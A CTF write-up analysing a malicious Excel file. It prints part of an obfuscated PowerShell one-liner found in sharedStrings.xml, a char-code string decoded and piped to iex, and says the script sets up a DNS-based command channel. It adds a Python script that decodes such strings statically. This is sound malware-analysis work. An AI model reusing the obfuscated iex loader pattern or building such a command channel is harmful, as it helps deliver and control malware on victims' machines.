
S21SEC [DCS17CTF] – Finlandia


Hi mates,

During my spare time I tried some tasks from the DSC17 CTF by S21sec. I will comment here on those that I found more difficult or fun. FBCTF was used as the platform, so from here on the task names are the associated countries.

Finlandia – 400 points 

I have a suspicious Excel file, as the title says, and the first thing to do is uncompress or extract its contents. So use binwalk, rename it as a zip, or whatever. Inside we have a VBA bin file. We can use oledump.py to view its contents.

After some time trying to decompress and decode the VBA bin file, there seemed to be no way forward, so I started to look at the other files. I noticed one in particular, sharedStrings.xml:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>('83G116G97B114E1...[]...C112B116B98B108C111H99H107C32G123H1'.SplIt('BHECG')|%{([Char][Int]$_)} )-Join''|iex|out-null</t></si></sst>

So, this is obfuscated PowerShell code; let's try to see its contents.

It creates a DNS client to pass commands on PowerShell. The flag is «f25a2fc72690b780b2a14e140ef6a9e0»
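
The one-liner in sharedStrings.xml can be decoded statically, without ever letting `iex` run it. The Python below is an added example, not the author's code: it pulls every shared string out of the XML, finds the `'...'.Split('...')` construct and rebuilds the script text. The function names are illustrative and the sample XML is constructed (its payload decodes to `Get-Date`).

```python
import re
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

# '<digits and delimiter letters>'.Split('<delimiters>'), any letter case
PATTERN = re.compile(
    r"'([0-9A-Za-z]+)'\s*\.\s*split\s*\(\s*'([^']+)'\s*\)", re.IGNORECASE
)

# Constructed sample with the same shape as the string in the write-up.
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>('71G101B116E45H68C97G116B101'.SplIt('BHECG')|%{([Char][Int]$_)} )-Join''|iex|out-null</t></si></sst>"""


def decode_charcodes(encoded, delims):
    """Undo 'codes'.Split(delims) | %{[Char][Int]$_} -Join '' without executing it.

    Every character of `delims` is treated as a separator, which is what the
    string on this page needs (its delimiters appear one at a time).
    """
    parts = re.split("[" + re.escape(delims) + "]", encoded)
    chars = []
    for part in parts:
        if not part:
            continue  # two delimiters in a row leave an empty field
        if not part.isdigit():
            raise ValueError("unexpected token %r in encoded string" % part)
        chars.append(chr(int(part)))
    return "".join(chars)


def extract_payloads(shared_strings_xml):
    """Return the decoded text of every Split/[Char] payload in sharedStrings.xml."""
    root = ET.fromstring(shared_strings_xml)
    decoded = []
    for t in root.iterfind(".//m:t", NS):
        for match in PATTERN.finditer(t.text or ""):
            decoded.append(decode_charcodes(match.group(1), match.group(2)))
    return decoded


if __name__ == "__main__":
    for script in extract_payloads(SAMPLE):
        print(script)
```

Applied to the visible start of the real string, `83G116G97B114` decodes to `Star`.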
